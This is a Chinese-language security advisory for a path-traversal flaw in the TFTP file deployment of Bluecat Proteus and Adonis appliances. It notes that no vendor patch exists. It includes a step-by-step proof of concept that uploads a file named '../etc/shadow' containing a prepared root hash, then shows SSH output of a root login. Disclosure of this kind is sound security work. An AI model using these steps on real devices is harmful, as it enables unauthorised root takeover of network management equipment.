BUGTRAQ ID: 25214
Proteus是企业级的IP地址管理设备。
Proteus的TFTP服务器实现上存在漏洞,远程攻击者可能利用此漏洞获取服务器的root用户权限。
可以使用Proteus向所管理的Adonis设备上传文件,管理员可以命名TFTP文件,但没有对用户输入(如相对路径)执行数据验证。所上传的文件仅可拷贝到/tftpboot/目录,且文件拷贝是以root用户权限执行的,因此名为../etc/shadow的文件可以覆盖影子口令数据库/etc/shadow。
Bluecat Networks Proteus 2.0.2.0 Bluecat Networks Adonis 5.0.2.8 临时解决方法:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href="http://www.bluecatnetworks.com/" target="_blank">http://www.bluecatnetworks.com/</a>
1) 在Proteus配置中创建新的TFTP组
2) 添加TFTP部署角色,指定Adonis设备到组中
3) 在新TFTP组的顶级文件夹,添加名为../etc/shadow的文件并加载包含有以下行的文件:
root:Im0Zgl8tnEq9Y:13637:0:99999:7:::
4) 向Adonis设备部署配置
5) 现在可以口令bluecat以root权限登录到Adonis设备:
$ ssh root@192.168.1.11
root@192.168.1.11's password:
# cat /etc/shadow
root:Im0Zgl8tnEq9Y:13637:0:99999:7:::
注释:这个示例假设启用了SSH,iptable允许TCP/22端口。